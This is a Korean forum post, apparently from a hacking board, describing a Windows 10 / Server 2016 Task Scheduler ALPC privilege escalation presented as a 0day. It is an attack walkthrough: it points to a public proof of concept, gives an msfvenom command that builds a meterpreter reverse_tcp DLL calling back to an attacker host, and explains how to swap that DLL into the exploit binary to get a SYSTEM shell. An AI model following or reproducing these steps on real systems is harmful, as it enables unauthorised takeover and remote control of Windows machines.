Windows 권한 에스컬레이션 0day

krhackapt

Administrator
직원
win10의 작업 예약 서비스에서 내보낸 함수는 호출자의 권한을 확인하지 않습니다. 모든 권한을 가진 사용자는 이 함수를 호출하여 시스템의 중요한 파일에 대한 쓰기 권한을 얻을 수 있으므로 권한이 향상됩니다. 영향 범위: Windows 10, Windows Server 2016. 그룹의 모든 친구가 어제 재현하여 성공했습니다. 일부 친구도 Windows 8에서 시도하여 권한을 성공적으로 에스컬레이션할 수 있음을 확인했습니다.


준비: POC 다운로드, Windows 10 이미지, 프로세스 탐색기, CFF
POC: GitHub - SandboxEscaper/randomrepo: 임의 항목에 대한 저장소
windows10 ISO: msdn
프로세스 탐색기 다운로드: 프로세스 탐색기 - Windows Sysinternals | Microsoft Docs
CFF: Explorer Suite - NTCore


먼저 열기 메모장

Windows 권한 상승 0day HACKAPT-1.png



아무런 차이가 없습니다. 실행
Windows 권한 상승 0day HACKAPT-2.png



하위 프로세스 conhost 및 메모장이 포함된 cmd.exe가 시스템으로 생성되었습니다!



kali에서 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f dll >

PvFgQP.md.png



windows10으로 이동
Windows 권한 상승 0day HACKAPT-4.png



CFF에서 ALPC-TaskSched-LPE.dll을 열고 msf에서 생성된 dll을 교체한 후 저장합니다.
Windows 권한 상승 0day HACKAPT-5.png







Windows 권한 상승 0day HACKAPT-6.png



kali에서 모니터링 명령 실행
Windows 권한 에스컬레이션 0day HACKAPT-7.png



Windows 10에서 실행
Windows 권한 상승 0day HACKAPT-8.png



kali로 돌아가면 미터프리터가 성공적으로 반송되었으며 시스템 권한이 있음을 알 수 있습니다.
Windows 권한 상승 0day HACKAPT-9.png







Windows 권한 상승 0day HACKAPT-10.png







Windows 권한 상승 0day HACKAPT-11.png
 
뒤로
상단